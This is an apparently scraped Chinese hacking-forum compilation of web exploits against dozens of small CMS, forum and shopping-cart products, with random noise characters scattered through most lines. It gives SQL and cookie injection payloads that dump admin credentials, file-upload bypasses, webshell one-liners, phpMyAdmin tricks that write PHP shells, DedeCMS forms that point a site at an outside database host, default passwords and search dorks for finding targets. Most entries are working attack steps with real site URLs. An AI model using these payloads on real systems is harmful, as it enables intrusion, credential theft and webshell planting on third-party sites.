启航企业建站系统 cookie注入漏洞通杀所有版本! O+ D9 C0 u5 A
1 i; @& F7 W/ z4 F- {直接上exploit:
- _4 y3 k) ^" y/ I2 Wjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));2 q5 t4 }* A* ~, `( v
test:http://www.tb11.net/system/xitong/shownews.asp?id=2102 @0 E& u# g1 ^: \
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 N* z8 l" a i2 U1 ?( u
Asprain论坛 注册用户 上传图片就可拿到webshell3 C# Z2 A% M2 W O$ Z
. y! l0 G0 v' \% V. S* S
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
' S' c2 m7 }, z$ v" ~, k3 c: z1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
5 \& i! }# k Q' e" e! _ w2 a2.gif 为一小图片文件,一定要小,比如qq表情图片
0 P I. @6 g8 b) l4 o3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用+ C' L3 K& e$ [- H' R
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
' P& R% Y& Y- F4 p: x5.q.asp;.gif. n4 {: c/ W" v3 C
google:Powered by Asprain! m8 E7 I3 a4 [- B( F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, ]" {9 H! r1 T5 f5 y0 Z6 c
8 ~' y! \' E! D6 k- `8 b) Z
ShopNum1全部系统存在上传漏洞。
2 R, m1 T, l! e3 N1 Y4 v
# h- y4 b" @/ ]5 B. Q0 W( ~" b0 K* C首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
& s) Y2 B8 ^. s! c: T& x0 _. y按说明 提示登录后台。。3 j6 e( ?/ X' W% w' L2 [' c8 s7 j
在后台功能页面->附件管理->附件列表. T' j$ T2 S" B6 s
可以直接上传.aspx 后缀木马
8 Y8 i" H* {/ N9 y, vhttp://demo.shopnum1.com/upload/20110720083822500.aspx
3 c+ e; B: ]0 d2 T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 A* O1 J2 Z$ k/ U& W9 v n3 l# ^ n/ }
牛牛CMS中小企业网站管理系统 上传漏洞1 O+ @+ o/ e' g
$ [ N( F; c% @ ~& M! r
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
9 V/ h0 m0 }9 R, f+ h: U* z后台:admin/login.asp
, ^& l1 z. T3 ]+ newebeditor 5.5 Nday% ?! a9 D1 A, Q
exp:
/ k/ T) f8 g8 `6 O<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?+ r( u7 ^7 r8 H- Y2 M2 N
<input?type=file?name=uploadfile?size=100><br><br>?
3 a* v/ }7 x8 y* z; \* p<input?type=submit?value=upload>?
9 {; F4 [- P' m</form>
4 m6 ^& l* ^- h4 @2 \' Y5 hps:先上传小马.# y* z- A) B% F( z; f. X
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
, U- ?" g, ]5 d& h
' l3 }! g h4 s8 G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ [4 w& k* t& S+ A1 q* Y4 _# ]& p3 Q! r: q
YothCMS 遍历目录漏洞
2 F, n+ X( Y; W& r
. Z8 Z! R7 W" \+ |% `& S优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
7 R% a3 p- z$ _, e, Z默认后台:admin/login.asp
( z+ `' d( a8 z9 ~7 {: C遍历目录:
7 s9 s: p; x7 o) _4 _ewebeditor/manage/upload.asp?id=1&dir=../1 F1 X! ?! i" O( a( @/ U. w7 y; c# ]
data:
2 i* v' P% i1 d s: nhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa; ~% a5 ?5 D" Q( O* K9 S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 L* J N. u4 z% T& N9 { c3 J, Y' S
Net112企业建站系统 1.06 s: x) J4 i8 a8 g/ ~; l7 q
, n) o& c, O& J- X. k源码简介:1 `' u# N4 E* ?2 d/ M
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
* x4 o$ N" a% U添加管理员:9 k" I1 t2 {# q9 S3 u" V! `3 D
http://www.0855.tv/admin/admin.asp?action=add&level=2
9 N3 t) }$ r# Z4 `% Z, M( w其实加不加都不是很重要,后台文件都没怎么作验证。
2 ]3 B# {# R6 K2 t5 b2 D, ~7 h上传路径:
, B) b( \6 e* y/ o: v8 L5 Yhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
) S" J' i, y" r* q, {1 u& Phttp://www.0855.tv/inc/Upfile.asp?Stype=2& C) t( a5 \ \
怎么利用自己研究。
! ]8 `& H4 M3 L遍历目录:
9 g2 s) I" h1 R) Y" Rhttp://www.0855.tv/admin/upfile.asp?path=../..# n1 L6 m+ L5 p. |& }* {+ [) Y' l
如:* Y1 \# z5 D9 b& a- K
http://www.0855.tv/admin/upfile.asp?path=../admin7 m/ K" b! B( O' f$ L
http://www.0855.tv/admin/upfile.asp?path=../data. e' x6 l: Z$ n6 S; x8 y5 v' o5 j- w% a
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 ]4 V s) f6 D v$ H! O5 T
- ?5 G" U3 u) {9 }易和阳光购物商城通杀 上传漏洞% I2 i p3 n0 r0 T; [3 C% V E7 z
) F2 t# q1 i. f; u
前提要求是IIS6.0+asp坏境。
# L0 Z/ O9 I$ U8 T# L# p! Z漏洞文件Iheeo_upfile.asp
4 _2 U0 m( F! K& o1 r7 F过滤不严.直接可以iis6.0上传2 s6 ^+ I1 f2 x2 R! E4 P
把ASP木马改成0855.asp;1.gif
% \& |4 c0 M# U1 S6 R! f直接放到明小子上传
* y+ r& i4 Y8 T6 R8 x$ Q; |; b2 uGoogle搜索:inurl:product.asp?Iheeoid=7 _7 }1 [4 S* K3 B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 B: t4 q' S" Q. B$ Z9 V
+ S* D& D( O2 c& f4 F& ~
phpmyadmin后台4种拿shell方法
7 b+ O5 u5 u3 o* D: t' V& H R9 @8 G# y- v# K
方法一:' B- Y% q" ^* K( s: T* B$ m
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
& x) v6 s( W6 T4 MINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');4 Z; X, |% S/ k/ n
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';; W2 U1 n8 R/ Y; o3 D- ?
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
5 ?4 r5 N: u" b- \: f/ K2 H0 _; D一句话连接密码:xiaoma
6 v' d+ c) ~. C% h6 k$ F方法二:. `: e0 Y: M4 [
Create TABLE xiaoma (xiaoma1 text NOT NULL);) e% W6 g, @* J
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
/ `7 b7 `/ ~5 O0 T; J+ ^select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';. ~+ d9 C( F1 p
Drop TABLE IF EXISTS xiaoma;
9 a8 ]4 c7 \" V; A方法三:
% U; r( ^6 z+ M* C8 y2 D" c* L读取文件内容: select load_file('E:/xamp/www/s.php');2 e' U! n5 R. n$ R& Q+ E( Z
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ r! _' N. I9 o% r9 e% A, \+ tcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 `1 l) V* ~6 `) A2 u* @- _2 T0 Y c" ]$ S方法四:
3 r7 X, A: E% t- X& Pselect load_file('E:/xamp/www/xiaoma.php');
( \6 c, P0 ^' M8 Cselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'2 w! T6 f: q4 T# p( q; [9 B
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
+ }$ N( a- Q0 H/ O0 W; L4 \/ h' E& }--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- B) K# K2 s, ^) m3 j. f
( ~3 v- {) ~2 ^! V
传信网络独立开发网站源码0day漏洞% X% z, d# [( ]9 N3 l2 Q- `
# I2 M2 x4 K& ]; T后台system/login.asp0 b9 U1 y2 x* T& X7 z2 U y$ |" g
进了后台有个ewebeditor% [4 X; ]" {4 ~! b
Google 搜索inurl:product1.asp?tyc=
1 k$ U% U3 q6 ~4 P* n* @9 u, P编辑器漏洞默认后台ubbcode/admin_login.asp
' O1 m( u3 V/ X. y$ Z* C) w f数据库ubbcode/db/ewebeditor.mdb
- r$ B% r4 z' z8 t" [, b默认账号密码yzm 1111119 J5 ?! S f# G5 R
/ A" r) y2 o- c* b! X# o& T' R- n
拿webshell方法
" O& p) A! e/ P$ k登陆后台点击“样式管理”-选择新增样式
0 r- {! m% R/ K- i7 s) d样式名称:scriptkiddies 随便写
% E5 x- C$ v$ t+ n2 i6 y6 Y路径模式:选择绝对路径 6 S: d, A n; Z! X9 v3 o; t* g3 g9 b
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
6 j1 u8 T) E0 r) s. ]. {图片类型比如就是我们要上传的ASP木马格式9 [4 S3 ~/ V( E) p/ o3 k) ^* k
上传路径:/- `! Q" p% d% |3 `1 ^( t$ u+ l
图片限制:写上1000 免的上不了我们的asp木马
# i; B* d8 j ^' B( f. r上传内容不要写
: B' C- X% _( `7 G( t/ M3 B可以提交了
U6 X/ r/ X' M4 u6 D样式增加成功! : y# ]) F+ R, q B4 m
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
% Z3 v; e3 a- I9 P% B& D按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置( D+ g9 b2 x7 H
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies8 I3 W& l; W7 G) h( ~9 l3 n# F0 v
上ASP木马 回车 等到路径
9 R( M- a# F& l8 h" g; Y
( `6 ^( l, a2 l" n3 L" I$ I3 d- O后台:system/login.asp
9 e0 c8 @1 ?& D2 n8 |Exp:
& [6 o2 T' A) zand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
( E, K6 u% |; J/ q' ^+ b" N' n) `) n$ e测试:4 K2 k: b/ C' F# `4 b
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master R7 s: U3 |; v
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master+ N, Y$ r9 Z) x2 k4 l7 {3 `1 @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 O* T4 ^" D) [" L& J+ ]+ ?1 \
2 `2 J. o+ W) l$ Z2 d, y9 T( `1 `foosun 0day 最新注入漏洞9 G0 J) I, C- f4 @& j# n8 T8 t1 G
: M5 N$ u$ ^" M3 J$ \7 q8 a
漏洞文件:www.xxx.com/user/SetNextOptions.asp/ f; t5 r- |1 c% H8 O
利用简单的方法:
8 x& b) \, x1 q暴管理员帐号:
2 q3 n/ @ ]* B; e- Q( lhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
1 f0 {" k; O! E* T暴管理员密码:. g- c$ @9 o: A6 {" N4 o4 `3 r3 t0 I
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! T: i0 {' }" Y3 q" L) Q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) u& X& @2 I- j" a
/ N+ b. b$ W! F( m# p网站程序的版权未知!
2 J0 G/ f( d. M) K6 K4 |+ r/ A; l. [' B" Y8 O, \9 e
默认网站数据库:) p4 B- i3 q8 F
www.i0day.com/data/nxnews.mdb
8 }. v1 r; B- Q/ p# I( D+ hewebeditor 在线编辑器:
3 Q3 k3 b9 c7 y a l编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
" w1 ~. ^) n5 e' C8 |& j登录地址:ewebeditor/admin_login.asp
* B' t2 X' K& H! r! C' Y% A默认密码:admin admin5 F/ v0 C3 v1 T( j2 `5 _
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
' \5 Z6 }, k) R4 t1 R/ n/ P& i; u' u8 l3 ~
Sql注入漏洞:/ L! P5 Q+ o0 L7 C5 D4 R- D" c6 ^
http://www.i0day.com/detail.asp?id=121 s( F/ e6 ~( u2 D4 @( K$ T1 q
exp:$ q9 p$ T, T6 r5 l
union select 1,admin,password,4,5,6,7,8 from admin
* p; |; {" C& |/ e9 i( l爆出明文帐号/密码9 s7 W2 [ D9 y; F j
- A0 O/ N2 f: i; a9 M* w0 f9 \
上传漏洞:
: B3 ^+ w8 j2 V' @% l后台+upfile.asp7 [ O8 P: Q6 V* H, N D3 b1 @
如:
) ^, |/ D/ k5 Dhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。( Q# J8 ]. d* J/ T
shell的地址:网址+后台+成功上传的马# v1 t ^- Z9 ?3 k4 D
google:inurl:news.asp?lanmuName=
9 f4 a& d! ~& E; t------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Z0 A8 S) O7 U: \7 h8 S: ~
+ w% V3 h8 }) } M
dedecms最新0day利用不进后台直接拿WEBSHELL
( b: f! t% h+ O' z3 t" }- T- q _% q8 R* p
拿webshell的方法如下:' r% y; \$ S5 J
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
1 N: ]: v* S/ m' t" |1 v前题条件,必须准备好自己的dede数据库,然后插入数据:
) r+ }( c1 T/ `2 i/ Q7 O! uinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
7 c+ D* X- @$ ^3 L2 Y
& |) s1 ?" a, w t$ D: M3 z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。5 K* K( d) r$ h) o+ d' z& q
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
, s7 U) z. \5 v, X$ g9 W<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 s7 ]) Q& u) z<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! L/ Q, q- v$ i+ p& a
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
1 N: D6 I* |- |5 F8 a<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 s$ x; ~; a& W6 y2 u<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> _# t/ Y9 d' e' | \3 Q
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />2 h) f# }! m4 _ W! D& z+ r
<input type="text" value="true" name="nocache" style="width:400">+ i5 u e! O, d( U4 y6 C, D( l
<input type="submit" value="提交" name="QuickSearchBtn"><br />5 k9 M+ m9 r4 l. r6 I
</form>8 O0 j" J; y- x- D2 v: [5 G
<script>4 @* `7 f1 Q# s0 W/ _- p
function addaction()
% D; M9 K9 t: V/ b{
0 M4 Z+ E* z" w, ~, T' |document.QuickSearch.action=document.QuickSearch.doaction.value;+ Y/ a7 X( N, M
}
( q# ]! D: d$ n1 j' j</script>
F6 S/ P& B% P" L9 _-----------------------------------------------------------------------------------------------------------------------------------------------
# \6 C$ ]/ L6 q1 q& h ]/ ~: z+ C# F& S, \. ~3 x" d2 J% O) U
dedecms织梦暴最新严重0day漏洞
9 c8 A# \ r, q* A7 m8 v" tbug被利用步骤如下:2 b& I0 t C& d* ^9 g" V+ `
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* g1 I" u' T; f& @把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
/ |0 S* i# l) L-------------------------------------------------------------------------------------------------------------------------------------------
+ b+ S6 E. D" p: y6 m
" G5 t& u; }, G多多淘宝客程序上传漏洞 ~/ `! y# X# I' m
漏洞页面:1 ?! t9 a- y: C# f% A
admin\upload_pic.php1 H* U4 k; n# f: L* N
传送门:/ C& H' c5 A( _5 Q- ^
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
( b; F* [1 Z7 T, A7 C ^+ mPS:copy张图片马 直接 xxx.php 上传抓包地址! D# j. O' S; Z6 w. ?) |& b$ o2 T
------------------------------------------------------------------------------------------------------------------------------------------------------% ~" N1 ~* d3 W- W
& g% o4 X. ?( j8 Z8 i) d无忧公司系统ASP专业版后台上传漏洞; g! W8 K9 h0 y! f. w
漏洞文件 后台上传' t& T! u% t. i& Q5 u
admin/uploadPic.asp* {9 R$ i4 X8 ^7 _
漏洞利用 这个漏洞好像是雷池的; i9 x" q8 c& q# o# o o
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=19 M4 f* @/ G) a2 m
等到的webshell路径:$ K! M3 f" H" T, j! L
/UploadFiles/scriptkiddies.asp;_2.gif
p% L/ _, [% ~& H2 ^---------------------------------------------------------------------------------------------------------------------------------------------------
' L3 _+ w' p5 Y8 k( M
! i2 W% C% R, L0 U: J1 L住哪酒店分销联盟系统2010! H) O# Z9 u4 c
Search:
0 E' U8 C! r9 m2 Z1 @) c- {inurl:index.php?m=hotelinfo$ p3 q9 x5 l0 s( {
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin9 c: o5 e! u6 ]0 i6 R3 }
默认后台:index.php?m=admin/login: l; H9 ^2 ?9 M
--------------------------------------------------------------------------------------------------------------------------------------------------
$ i* Z3 \5 _5 ~' I) r
- h/ I# l$ z% Z) z3 Z! oinurl:info_Print.asp?ArticleID=# ~! O f% J J& ]: O# M
后台 ad_login.asp
# l' G- @$ q% W! l7 |# B" x/ W爆管理员密码:: A9 t8 W) n$ M5 O5 U# t
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin8 a3 N' j5 T. g) `$ u
------------------------------------------------------------------------------------------------------------------------------------------------------------
, \( X/ m6 o/ t- k5 K7 M; W
6 }! T4 j* {% ~搜索框漏洞!" _4 H6 t# X5 x. e
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
! d; i6 P3 p6 x( n2 y--------------------------------------------------------------------------------------------------------------------------------------------------------
& Y( ~- B9 @: m1 t) ]
' W2 E' \/ G7 X5 w# Z1 _3 L3 O关键字:
" E8 Z* Y1 `- a5 T) e2 z$ iinurl:/reg_TemletSel.asp?step=2) ^. |0 K r- ]8 e5 I
或者
0 G. }! W! `/ p2 ^1 }5 R& }3 a电子商务自助建站--您理想的助手
) n# K$ e! `. ?' L: }! @9 r-------------------------------------------------------------------------------------------------------------------------------------------------1 m/ y8 _0 L! c' A
# m, m2 U3 G8 |2 QiGiveTest 2.1.0注入漏洞7 V% G% [2 x4 u% C" X6 l1 }
Version: <= 2.1.0
# }. q N6 \. p' x& _' y7 }5 x- E) |, J# Homepage: http://iGiveTest.com/
4 b w4 l3 A* ~+ |$ ~5 o谷歌关键字: “Powered by iGiveTest”2 i( {, i# R3 a
随便注册一个帐号。然后暴管理员帐号和密码
8 g! d; ^( j- u1 x7 dhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
9 G! `& b" W5 Z) y Q------------------------------------------------------------------------------------------------------------------------------------------------( b. Z& q. s. Y0 B9 k) ^
8 Z& v: i# t* rCKXP网上书店注入漏洞/ {% |; S( m; k1 c% o$ h8 z1 D
工具加表:shop_admin 加字段:admin
' m# R- s$ s. }2 z后台:admin/login.asp # k: A6 d3 |9 `; ` E5 K# G+ h$ K* t
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
' r, L7 C' c; N2 pinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, l6 O. y5 k' g2 w0 r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ G2 e! s% c* k) y; n) O J
; c: t! {: C# i* P# M( m! @
段富超个人网站系统留言本写马漏洞0 _# F7 h! Y; b+ _+ p& N$ E, `5 ^
源码下载:http://www.mycodes.net/24/2149.htm
! }6 K) A4 p. B* Vaddgbook.asp 提交一句话。1 [; T: b4 y4 g& N
连接: http://www.xxxx.tv/date/date3f.asp, y8 L" R I4 o6 U
google:为防批量,特略!
8 \; C9 e5 ]0 N* K9 j" ^-------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 T6 e4 t1 k0 o' N9 K+ b8 {
, r) _8 M9 B) @5 W! _智有道专业旅游系统v1.0 注入及列目录漏洞
9 _: H8 _ {0 I) V默认后台路径:/admin/login.asp
$ X6 n* h7 D4 ?默认管理员:admin
" F+ m+ m! [" f$ G# R7 O* O默认密码:123456
6 X# g! N1 ~0 K9 V2 l7 jSQL EXP Tset:
: Z/ R2 H9 i, y# w. {. t1 q. Lhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
, q: |8 z- O( J5 e9 h& Z4 q------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 `9 R4 m% b9 c
) v- y0 q7 U$ B& Q+ P
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
( q: n5 [. D& O; v" n7 OEXP:
& ~# ?% r$ `4 w) n1 y) ~1 R: v( n& _<title>eWebeditoR3.8 for php任意文件上EXP</title>
" f* g5 _+ u9 S+ ^+ I+ `2 y' y" l# w% {<form action="" method=post enctype="multip
* u% \( T) A/ A! p, X ]art/form-data"> : z5 G- z, ?3 Y( y* L2 D
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
4 z+ u2 c/ ]7 G' pURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> % p% L1 t7 i6 `
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
- j1 S0 l8 N* L+ k$ T# y" Cfile:<input type=file name="uploadfile"><br> $ H+ N6 c6 W1 _! M) J# G/ t! |1 \5 Y, v
<input type=button value=submit onclick=fsubmit()> 9 v+ A6 S, I+ P$ E5 o4 |
</form><br>
4 u* I- M8 Y4 a6 V% G$ i<script> ) X: i2 e" m1 g# r$ w5 c. x* L2 k- _) W
function fsubmit(){
* c% V4 c" E$ ?, Z* P( t: tform = document.forms[0]; ) K, }" ^1 F' G# ^/ g5 `1 {# Z
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
8 S( I! [4 g3 u H# [3 Talert(form.action); : ]- R h- @! u. p+ ?
form.submit();
9 k+ h) R! N8 I% U- [: C3 {} " @+ y1 n5 m! v8 a
</script>5 t5 C3 S+ L7 c8 b
注意修改里面ewebeditor的名称还有路径。' P6 } X. v% y7 [
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
N% J5 Z, P3 m; A6 C1 z, A) O- D+ B O$ M$ \
提交’时提示ip被记录 防注入系统的利用
( Z {: {/ O" V" W2 E) k网址:http://www.xxx.com/newslist.asp?id=122′
: S# j2 Z& m2 z- s7 w提示“你的操作已被记录!”等信息。
4 _- ~ U9 L* Z9 r/ R" X利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。7 I5 n7 v t$ {; a9 w. X2 Z: E1 C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( j2 {- D! C7 A, `1 d
/ |; y s' ]+ r Y; R西部商务网站管理系统 批量拿shell-0day" v: |/ u- f/ ~+ }/ y
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ; Q/ f" w) R9 Q& {1 O- U- W
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
, Z i* e3 h4 U' T4 q2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
# S# i, d/ d* z8 X% [0 a- d3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
& L0 i* q# y O% B% {+ M+ J0 Z$ @---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 z3 G K8 b4 R1 n0 I* S
0 Z0 U' t+ u' r: u" v5 TJspRun!6.0 论坛管理后台注入漏洞; }5 r& K4 B1 H' _. w
& I9 V4 M% y1 y& B. K/ Y0 S; [SEBUG-ID:20787 发布时间:2011-04-30 影响版本:3 q7 F* |) G0 C/ z8 K8 N t# E
JspRun!6.0
" ?" M' H$ Q5 ?" v* D3 E漏洞描述:; ~0 j4 V0 L1 n. m
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
$ @+ k8 m- N& d% b, R& a6 O在处理后台提交的文件中ForumManageAction.java第1940行
G. B& f& W) _) x: u JString export = request.getParameter("export");//直接获取,没有安全过滤
( M a3 I" G" A# Hif(export!=null){ A, U) E) S% C- n* w. q
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
0 R" {' x8 ~ V& }% Xif(styles==null||styles.size()==0){
7 E4 W( \- P5 c/ r3 o% N6 E<*参考
3 r1 d- s. e7 V/ x2 G' znuanfan@gmail.com( R) F) E8 _* _5 q% m( g! k
*> SEBUG安全建议:
( @7 z0 Q* u; f( w% i0 w$ nwww.jsprun.net
0 t4 O( k2 Z& W/ _(1)安全过滤变量export
: }* E8 U; n, t2 `8 Z1 i3 |(2)在查询语句中使用占位符( w! w' G0 v8 W1 ?( W5 v! r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 a$ B6 j: K N ~& `' \: Q
) [6 `, p/ p4 c A" ^
乌邦图企业网站系统 cookies 注入
/ Q# k) o% l; y$ L8 ?3 N. ~' ~) w- {$ \
程序完整登陆后台:/admin/login.asp5 C; I1 Q. r8 Y5 g
默认登陆帐号:admin 密码:admin888$ G' l& g c) e- e, Y/ U/ F
语句:(前面加个空格)
, R8 ~& E/ Z- k6 t# d! \and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin3 X) e' {. ?2 i- I; N4 z
或者是16个字段:- {- `! X2 L4 U! s. ?4 \# Z; k4 J
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin2 P% d# R% g& x( _
爆不出来自己猜字段。
u/ r5 _0 ~5 x2 }- w. j/ u' G注入点:http://www.untnt.com/shownews.asp?=881 v8 b- G% k: I9 ~! ^# X: Y
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
0 b* H0 f# o, D! [# @! ^1 [! `关键字:: a( ~- E& _1 b3 |6 }6 l- E
inurl:shownews?asp.id=" b( }& g' S2 G' y* ^0 }
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 S) d: H* E1 i' W. s- J
( O! G$ X' _. A( N; d0 c
CKXP网上书店注入漏洞
$ K8 p6 T$ ^- L, g5 C1 m) Z, c$ \" I0 M9 l! F' d' P) x
工具加表:shop_admin 加字段:admin% R( |- h n$ W* _ R
后台:admin/login.asp
- l3 m: h# n! @登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ Y6 n; {' ?0 F9 e) Binurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息2 C' v" E" p' e( L) a
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 [& H* b2 |; R7 P# Z- Q3 m
6 B: D$ X" E: f9 \YxShop易想购物商城4.7.1版本任意文件上传漏洞: G/ ]) Q$ U1 x
# a- q3 k, i9 }2 w8 G- q$ |+ j. `http://xxoo.com/controls/fckedit ... aspx/connector.aspx
# u$ |( R7 ~6 {* G% _( @ H跳转到网站根目录上传任意文件。
